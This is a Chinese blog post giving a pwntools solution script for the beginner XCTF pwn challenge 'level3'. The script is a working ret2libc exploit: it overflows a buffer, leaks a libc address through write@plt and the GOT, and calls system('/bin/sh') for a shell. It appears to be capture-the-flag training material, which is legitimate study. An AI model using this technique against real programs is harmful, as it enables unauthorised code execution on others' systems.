• xctf pwn(新手练习)level3

    xctf pwn level3

    #-*-coding:utf-8-*-
from pwn import *
p = process('./level3')
#p = remote("111.198.29.45","36722")
elf = ELF('./level3')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
#libc = ELF('./libc_32.so.6')
write_plt = elf.plt['write']
print "write_plt: " + hex(write_plt)
# print hex(elf.symbols['write'])
write_got = elf.got['__libc_start_main']
print "write_got: " + hex(write_got)
libc_main = libc.symbols['__libc_start_main']
print "write_libc: " + hex(libc_main)
system_libc = libc.symbols['system']
print "system_libc: " + hex(system_libc)
vulnfun = 0x804844B
# pause()
#write(1,write_got,4)
p.recv()
payload = 140*'a' + p32(write_plt) + p32(vulnfun)
payload += p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
print "write_addr: " + hex(write_addr)
pause()
offset = write_addr - libc_main
system_addr = offset + system_libc
binsh = libc.search("/bin/sh").next()
binsh_addr = offset + binsh
print "binsh_addr: " + hex(binsh_addr)
payload = 140*'a' + p32(system_addr) + p32(vulnfun) + p32(binsh_addr)
p.sendline(payload)
p.interactive()
  • 相关阅读:
    设计模式浅谈
    链表的遍历(1)
    链表的删除(3)
    链表结构的反转(5)
    二叉树数组表示法
    循环链表的插入和删除
    链表的链接(2)
    双向链表内结点的删除(4)
    hdu1042
    数组和链表的区别
  • 原文地址:https://www.cnblogs.com/xlcm/p/11905751.html
Copyright © 2020-2023  润新知